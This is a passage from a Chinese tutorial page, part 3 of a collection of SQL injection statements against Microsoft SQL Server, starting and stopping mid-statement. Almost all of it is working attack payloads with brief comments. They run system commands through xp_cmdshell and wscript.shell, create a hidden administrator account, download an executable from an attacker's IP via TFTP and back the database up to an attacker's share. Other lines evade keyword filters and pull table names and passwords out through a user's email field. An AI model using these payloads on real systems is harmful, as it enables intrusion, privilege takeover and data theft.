当前位置:Gxlcms > mysql > 常用SQL注射语句解析(3)_MySQL

常用SQL注射语句解析(3)_MySQL

时间:2021-07-01 10:21:17 帮助过:17人阅读

bitsCN.com

aths(path)

  values(@test)--

  ;use ku1;--

  ;create table cmd (str image);-- 建立image类型的表cmd

  存在xp_cmdshell的测试过程:

  ;exec master..xp_cmdshell 'dir'

  ;exec master.dbo.sp_addlogin jiaoniang$;-- 加SQL帐号

  ;exec master.dbo.sp_password null,jiaoniang$,1866574;--

  ;exec master.dbo.sp_addsrvrolemember jiaoniang$ sysadmin;--

  ;exec master.dbo.xp_cmdshell 'net user jiaoniang$ 1866574 /workstations:*

  /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--

  ;exec master.dbo.xp_cmdshell 'net localgroup administrators jiaoniang$

  /add';--

  exec master..xp_servicecontrol 'start', 'schedule' 启动服务

  exec master..xp_servicecontrol 'start', 'server'

  ; DECLARE @shell INT EXEC SP_OACreate 'wscript.shell',@shell OUTPUT EXEC

  SP_OAMETHOD @shell,'run',null, 'C:/WINNT/system32/cmd.exe /c net user

  jiaoniang$ 1866574 /add'

  ;DECLARE @shell INT EXEC SP_OACreate 'wscript.shell',@shell OUTPUT EXEC

  SP_OAMETHOD @shell,'run',null, 'C:/WINNT/system32/cmd.exe /c net

  localgroup administrators jiaoniang$ /add'

  '; exec master..xp_cmdshell 'tftp -i youip get file.exe'-- 利用TFTP上传文件

  ;declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:/'

  ;declare @a sysname set @a='xp'+'_cm’+’dshell' exec @a 'dir c:/'

  ;declare @a;set @a=db_name();backup database @a to

  disk='你的IP你的共享目录bak.dat'

  如果被限制则可以。

  select * from openrowset('sqloledb','server';'sa';'','select ''OK!'' exec

  master.dbo.sp_addlogin hax')

  查询构造:

  Select * FROM news Where id=... AND topic=... AND .....

  admin'and 1=(select count(*) from [user] where username='victim' and

  right(left(userpass,01),1)='1') and userpass <>'

  select 123;--

  ;use master;--

  :a' or name like 'fff%';-- 显示有一个叫ffff的用户哈。

  and 1<>(select count(email) from [user]);--

  ;update [users] set email=(select top 1 name from sysobjects where

  xtype='u' and status>0) where name='ffff';--

  ;update [users] set email=(select top 1 id from sysobjects where xtype='u'

  and name='ad') where name='ffff';--

  ';update [users] set email=(select top 1 name from sysobjects where

  xtype='u' and id>581577110) where name='ffff';--

  ';update [users] set email=(select top 1 count(id) from password) where

  name='ffff';--

  ';update [users] set email=(select top 1 pwd from password where id=2)

  where name='ffff';--

  ';update [users] set email=(select top 1 name from password where id=2)

  where name='ffff';--

  上面的语句是得到数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。

  通过查看ffff的用户资料可得第一个用表叫ad

  然后根据表名ad得到这个表的ID 得到第二个表的名字

  insert into users values( 666,

  char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73),

  char(0x63)+char(0x68)+char(0x72)+c

bitsCN.com

人气教程排行